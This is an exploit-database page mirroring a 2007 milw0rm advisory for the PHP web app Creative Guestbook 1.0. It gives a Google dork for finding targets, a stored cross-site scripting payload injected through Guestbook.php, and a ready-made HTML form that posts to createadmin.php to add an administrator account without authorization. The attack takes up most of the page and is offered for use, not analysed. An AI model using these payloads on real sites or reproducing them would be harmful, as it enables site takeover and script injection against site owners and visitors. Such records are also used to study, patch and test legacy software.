[] NeoSense
E X P L O I T S
title author type platform port cve id

creative Guestbook 1.0 - Multiple Vulnerabilities

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-03-14 
date_updated:  
verified: 1 
codes: OSVDB-34234;CVE-2007-1480;OSVDB-34233;CVE-2007-1479 
tags: 
aliases:  
screenshot_url:  
application_url: 
                                                          .-""""""""-.
                                                         /   Dj7xpl   \
                                                        |              |
                                                        |,  .-.  .-.  ,|
                                                        | )(_o/  \o_)( |
                                                        |/     /\     \|
                                              (@_       (_     ^^     _)
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          /
                                               (@

+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   Creative Guestbook 1.0
#   Download   :   http://www.thecreativeheads.de/CreativeFiles/downloads.php
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "Creative Guestbook"
#   Class      :   (Add Remote Admin User)   And   (Cross Site Scripting)
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   css/xss :
#              http://[Target]/[Path]/Guestbook.php   <== Insert Yor Script
#              Example : <script> alert ('  dj7xpl ^_^  ') </script>
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#   Add Remote Admin User :
#
#	<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
#       <input type="text" name="Name" value="name"><br>
#       <input type="text" name="Email"value="email"><br>
#       <input type="text" name="PASSWORD" value="password"><br>
#       <input type="submit" value="Admin hinzuf&uuml;gen" name="submit">
#   </form>
#
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.